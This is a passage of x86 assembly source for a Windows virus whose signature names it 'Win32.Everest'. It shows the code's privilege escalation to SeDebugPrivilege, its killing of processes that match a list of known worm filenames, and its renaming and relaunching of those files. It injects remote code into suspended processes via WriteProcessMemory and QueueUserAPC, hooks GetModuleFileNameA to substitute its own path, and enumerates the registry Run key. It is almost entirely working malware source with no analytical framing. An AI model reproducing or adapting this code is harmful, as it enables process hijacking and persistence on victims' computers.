call GetWindowsDirectoryA
push 50
push offset szSysPath
call GetSystemDirectoryA
call RaisePrivileges
call GetAPIz
ret
;---------------------------------------------------------------
PatchAllVirus PROC szVirusList : DWORD , szPrefix : DWORD , szPrefix2 : DWORD
LOCAL hProcess : DWORD
LOCAL szVirusPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
mov esi , szVirusList
lea edi , szVirusPath
PAVLoop:
push esi
push szPrefix2
push szPrefix
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
mov al , byte ptr[edi]
or al , al
jz PAVExit
lea eax , szformatedPath
push eax
push edi
call formatVirus
lea eax , szformatedPath
push eax
call OpenNT4_2k_xp_2003Virus
mov hProcess , eax
PAVNextName:
lodsb
or al , al
jnz PAVNextName
mov eax , pMem
.if eax == 0
lodsd
.else
mov eax , offset PatchVirus
.endif
push edi
push hProcess
call eax
mov al , byte ptr[esi]
or al , al
jnz PAVLoop
PAVExit:
ret 12
PatchAllVirus ENDP
;------------------------------------------------------------------
formatVirus PROC pVirusName:DWORD , pformatedName:DWORD
pushad
mov esi , pVirusName
mov edi , pformatedName
FVCopy:
lodsb
cmp al , ' '
jz FVEndCopy
or al , al
jz FVEndCopy
stosb
jmp FVCopy
FVEndCopy:
xor al , al
stosb
popad
ret 8
formatVirus ENDP
;------------------------------------------------------------------
FixedVirus:
db 'system32/msblast.exe',0 ;msblast
dd offset PatchVirus
db 'Videodrv.exe',0 ;Mimail
dd offset PatchVirus
db 'system32/runouce.exe',0 ;ChineseHack
dd offset PatchVirus
db 'system32/gone.scr',0
dd offset PatchVirus
db 'system32/hfind.exe',0 ;muma
dd offset PatchVirus
db 'system32/scam32.exe',0 ;sircam
dd offset PatchVirus
db 'killonce.exe',0
dd offset PatchVirus
db 'system32/wins/DLLHOST.exe',0
dd offset PatchVirus
db 'system32/Ravmond.exe',0 ;Lovgate
dd offset PatchVirus
db 'system32/WinGate.exe',0
dd offset PatchVirus
db 'system32/WinDriver.exe',0
dd offset PatchVirus
db 'system32/Winrpc.exe',0
dd offset PatchVirus
db 'system32/Winhelp.exe',0
dd offset PatchVirus
db 'system32/Iexplore.exe',0
dd offset PatchVirus
db 'system32/NetServices.exe',0
dd offset PatchVirus
db 'system32/winexe.exe',0
dd offset PatchVirus
db 'mmc.exe',0 ;nimda
dd offset PatchVirus
db 'system32/load.exe',0
dd offset PatchVirus
db 'system32/wqk.exe',0 ;Klez
dd offset PatchVirus
db 'system32/krn132.exe',0
dd offset PatchVirus
db 'ParticularViruses',0
dd offset ParticularVirus
db 0 ;End of virus list
;-------------------------------------------------------------------
OpenNT4_2k_xp_2003Virus PROC szVirusName : DWORD
LOCAL hProcess : DWORD
LOCAL hMods : DWORD
LOCAL szProcessName[MAX_PATH] : BYTE
LOCAL ProcessIds[128+1] : DWORD
pushad
push szVirusName
push offset szWormPath
call lstrcmpi
jz OVFailExit
lea esi , ProcessIds
push (128+1)*4
push esi
call RtlZeroMemory
push offset tmp
push 128*4 ;*4
push esi
moveax,12345678h
_EnumProcesses = dword ptr $-4
call eax ;enumerate all running processes
dec eax
jne OVFailExit
add esi,4 ;esi->ProcessIDs[128]
ProcessSearch:
lodsd ;get PID
or eax , eax
jz OVFailExit
push eax
push FALSE
push PROCESS_ALL_ACCESS
call OpenProcess
or eax , eax
jz ProcessSearch
mov hProcess , eax
lea eax , hMods
push offset tmp
push 4
push eax
push hProcess
mov eax , 12345678h
_EnumProcessModules = dword ptr $-4
call eax
or eax , eax
jz OVClose
lea edi , szProcessName
push MAX_PATH
push edi
push hMods
push hProcess
mov eax , 12345678h
_GetModuleFileNameEx = dword ptr $-4
call eax
or eax , eax
jz OVClose
IsVirus:
push szVirusName
push edi
call lstrcmpi
jz OVSucExit
OVClose:
push hProcess
call CloseHandle
jmp ProcessSearch
OVFailExit:
popad
xor eax , eax
ret 4
OVSucExit:
popad
mov eax , hProcess
ret 4
OpenNT4_2k_xp_2003Virus ENDP
;---------------------------------------------------------------
PatchVirus PROC hProcess : DWORD , szVirusPath : DWORD
LOCAL szDestPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
pushad
mov eax , hProcess
or eax , eax
jz PVMoveVirus
push 0
push hProcess
call TerminateProcess
push INFINITE
push hProcess
call WaitForSingleObject
push hProcess
call CloseHandle
PVMoveVirus:
lea esi , szformatedPath
push esi
push szVirusPath
call formatVirus
lea edi , szDestPath
push esi
push edi
call lstrcpy
@pushsz '.scr'
push edi
call lstrcat
push edi
push esi
call MoveFile
push esi
call lstrlen
mov esi , szVirusPath
add esi , eax
push esi
push edi
call lstrcat
push edi
call StartVirus
popad
ret 8
PatchVirus ENDP
;-------------------------------------------------------------------
ParticularVirus:
ret 8
;-------------------------------------------------------------------
StartVirus PROC szVirusPath : DWORD
LOCAL sio : STARTUPINFO
LOCAL pi : PROCESS_INformATION
LOCAL cbWritten : DWORD
pushad
push sizeof(STARTUPINFO)
lea eax , sio
push eax
call RtlZeroMemory
mov sio.cb , sizeof STARTUPINFO
mov sio.wShowWindow , SW_HIDE
mov sio.dwFlags , STARTF_USESHOWWINDOW
lea eax , pi
push eax
lea eax , sio
push eax
push NULL
push NULL
push CREATE_SUSPENDED
push TRUE
push NULL
push NULL
push szVirusPath
push NULL
call CreateProcess
or eax , eax
jzSVExit
push 3000
call Sleep
pushPAGE_EXECUTE_READWRITE
pushMEM_RESERVE or MEM_COMMIT
pushRemoteCodeEnd - RemoteCodeStart
push0
push pi.hProcess
call VirtualAllocEx
or eax , eax
jzSVFail
mov esi , eax
add eax , NewGetModuleFileName - RemoteCodeStart
mov _NewGetModuleFileNameA , eax
lea eax , cbWritten
push eax
push RemoteCodeEnd - RemoteCodeStart
push offset RemoteCodeStart
push esi
push pi.hProcess
call WriteProcessMemory
or eax , eax
jzSVFail
push NULL
push pi.hThread
push esi
call QueueUserAPC
or eax , eax
jzSVFail
push pi.hThread
call ResumeThread
SVFail:
push pi.hThread
call CloseHandle
push pi.hProcess
call CloseHandle
SVExit:
popad
ret 4
StartVirus ENDP
;-----------------------------------------------------------------
RemoteCodeStart:
mov esi , 12345678h
_GetModuleFileNameA = dword ptr $-4
@pushsz '123' ;cbWriten
push PAGE_EXECUTE_READWRITE
push 6 ; push & ret
push esi
mov eax , 12345678h
_VirtualProtect = dword ptr $-4
call eax
@pushsz '123' ;cbWriten
push 6
call RCSJump
push 12345678h
_NewGetModuleFileNameA = dword ptr $-4
ret
RCSJump:
push esi
push -1
mov eax , 12345678h
_WriteProcessMemory = dword ptr $-4
call eax
ret 4
NewGetModuleFileName:
push esi
push edi
mov edi , [esp+16]
call _szWormPath
szWormPath db MAX_PATH dup (0)
_szWormPath:
pop esi
xor ecx , ecx
RCSLoop:
lodsb
stosb
inc ecx
or al , al
jnz RCSLoop
pop edi
pop esi
mov eax , ecx
dec eax
ret 12
RemoteCodeEnd:
;-----------------------------------------------------------------
GetAPIz:
@pushsz 'Kernel32.dll'
call GetModuleHandle
xchg eax,esi
@pushsz 'GetModuleFileNameA'
push esi
call GetProcAddress
mov _GetModuleFileNameA,eax
@pushsz 'VirtualProtect'
push esi
call GetProcAddress
mov _VirtualProtect,eax
@pushsz 'WriteProcessMemory'
push esi
call GetProcAddress
mov _WriteProcessMemory,eax
@pushsz 'PSAPI'
call LoadLibraryA
xchg eax,esi
@pushsz 'EnumProcesses'
push esi
call GetProcAddress
mov _EnumProcesses,eax
@pushsz 'EnumProcessModules'
push esi
call GetProcAddress
mov _EnumProcessModules,eax
@pushsz 'GetModuleFileNameExA'
push esi
call GetProcAddress
mov _GetModuleFileNameEx,eax
ret
;---------------Raise Privilege of our process----------------------
RaisePrivileges:
call GetCurrentProcess
push offset p_token
push TOKEN_ALL_ACCESS ;DesiredAccess
push eax
call OpenProcessToken ;open token of our process
or eax,eax ;God,I used cmp eax,eax first
jz RPExit
push offset p_luid
@pushsz 'SeDebugPrivilege'
push NULL
call LookupPrivilegevalueA ;find LUID for this priv.
dec eax
jne RPExit
push 0
call SetLastError
push NULL
push NULL
push NULL
push offset token_priv
push FALSE
push p_token
call AdjustTokenPrivileges
RPExit:
ret
token_priv dd 1
p_luid db 8 dup(0)
dd SE_PRIVILEGE_ENABLED
p_token dd 0
;-------------------------------------------------------------------
ReadRunKey PROC
LOCAL hKey : DWORD
LOCAL dwIndex : DWORD
LOCAL szFilePath[MAX_PATH] : BYTE
LOCAL szvalueName[MAX_PATH] : BYTE
LOCAL dwvalueLen : DWORD
LOCAL dwDataLen : DWORD
LOCAL dwType : DWORD
pushad
lea eax , hKey
push eax
push KEY_QUERY_value ;KEY_ALL_ACCESS
push 0
@pushsz 'Software/Microsoft/Windows/CurrentVersion/Run'
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
cmp eax , ERROR_SUCCESS
jnz RRKExit
push 0
pop dwIndex
push pMem
pop edi
RRKLoop:
push MAX_PATH
pop dwDataLen
push MAX_PATH
pop dwvalueLen
lea eax , dwDataLen
push eax
lea esi , szFilePath
push esi
lea eax , dwType
push eax
push NULL
lea eax , dwvalueLen
push eax
lea eax , szvalueName
push eax
push dwIndex
push hKey
call RegEnumvalue
cmp eax , ERROR_SUCCESS
jnz RRKClose
push edi
mov edi , esi
push edi
call lstrlen
mov ecx , eax
mov al , '/'
repnz scasb
pop edi
jz RRRKReplace
push esi
@pushsz '/'
push offset szWinPath
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
push edi
call lstrlen
add edi , eax
xor al , al
stosb
push esi
@pushsz '/'
push offset szSysPath
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
jmp RRKNext
RRRKReplace:
push esi
call ReplaceFilePath
push esi
push edi
call lstrcpy
RRKNext:
push edi
call lstrlen
add edi , eax
xor al , al
stosb
inc dwIndex
jmp RRKLoop
RRKClose:
push hKey
call RegCloseKey
RRKExit:
xor al , al
stosb
popad
ret
ReadRunKey ENDP
;------------------------------------------------------------------
ReplaceFilePath PROC szFilePath : DWORD
LOCAL s[MAX_PATH] : BYTE
pushad
push szFilePath
lea edi , s
push edi
call lstrcpy
IsSysDir:
push 8
pop ecx
@pushsz '%system%' ;len=8
pop esi
repz cmpsb
jne IsWinDir
push offset szSysPath
push szFilePath
call lstrcpy
jmp RFPCat
IsWinDir:
push 8
pop ecx
@pushsz '%windir%' ;len=8
pop esi
lea edi , s
repz cmpsb
jne RFPExit
push offset szWinPath
push szFilePath
call lstrcpy
RFPCat:
push edi
push szFilePath
call lstrcat
RFPExit:
popad
ret 4
ReplaceFilePath ENDP
Signature db 'Win32.Everest by PKXP/CVC, made in China.',0
szWinPath db 50 dup (0)
szSysPath db 50 dup (0)
tmp dd ?
pMem dd 0
VEnd:
end main